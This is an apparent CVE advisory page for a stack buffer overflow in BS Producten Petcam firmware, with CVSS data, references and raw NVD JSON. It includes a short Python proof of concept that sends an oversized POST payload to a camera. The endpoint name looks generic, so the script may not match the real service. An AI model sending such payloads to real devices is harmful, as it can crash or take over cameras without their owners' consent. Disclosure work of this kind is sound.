Security Vulnerability Report
CVE-2024-51348 CVSS 8.8 HIGH

Published: 2026-03-25 14:16:29
Last Modified: 2026-05-19 18:08:18

Description

A stack-based buffer overflow vulnerability in the P2P API service in BS Producten Petcam with firmware 33.1.0.0818 allows unauthenticated attackers within network range to overwrite the instruction pointer and achieve Remote Code Execution (RCE) by sending a specially crafted HTTP request.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

BS Producten Petcam firmware 33.1.0.0818

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Target configuration
TARGET_IP = "192.168.1.100"
TARGET_PORT = 80
PAYLOAD = b"A" * 500  # Buffer overflow trigger payload

# Construct malicious HTTP request
# Exploiting the P2P API endpoint vulnerability
request = b"POST /p2p_api_endpoint HTTP/1.1\r\n"
request += b"Host: " + TARGET_IP.encode() + b"\r\n"
request += b"Content-Type: application/x-www-form-urlencoded\r\n"
request += b"Content-Length: " + str(len(PAYLOAD)).encode() + b"\r\n\r\n"
request += PAYLOAD

try:
    # Send payload to trigger stack overflow
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, TARGET_PORT))
    s.send(request)
    print("Payload sent successfully.")
    s.close()
except Exception as e:
    print(f"Error: {e}")
```

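References

- https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2024-51348.md
- https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/README.md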

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-51348", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:29.210", "lastModified": "2026-05-19T18:08:17.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow vulnerability in the P2P API service in BS Producten Petcam with firmware 33.1.0.0818 allows unauthenticated attackers within network range to overwrite the instruction pointer and achieve Remote Code Execution (RCE) by sending a specially crafted HTTP request."}, {"lang": "es", "value": "Una vulnerabilidad de desbordamiento de búfer basado en pila en el servicio API P2P en BS Producten Petcam con firmware 33.1.0.0818 permite a atacantes no autenticados dentro del alcance de la red sobrescribir el puntero de instrucción y lograr Ejecución Remota de Código (RCE) enviando una solicitud HTTP especialmente diseñada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2024-51348.md", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/README.md", "source": "[email protected]"}]}}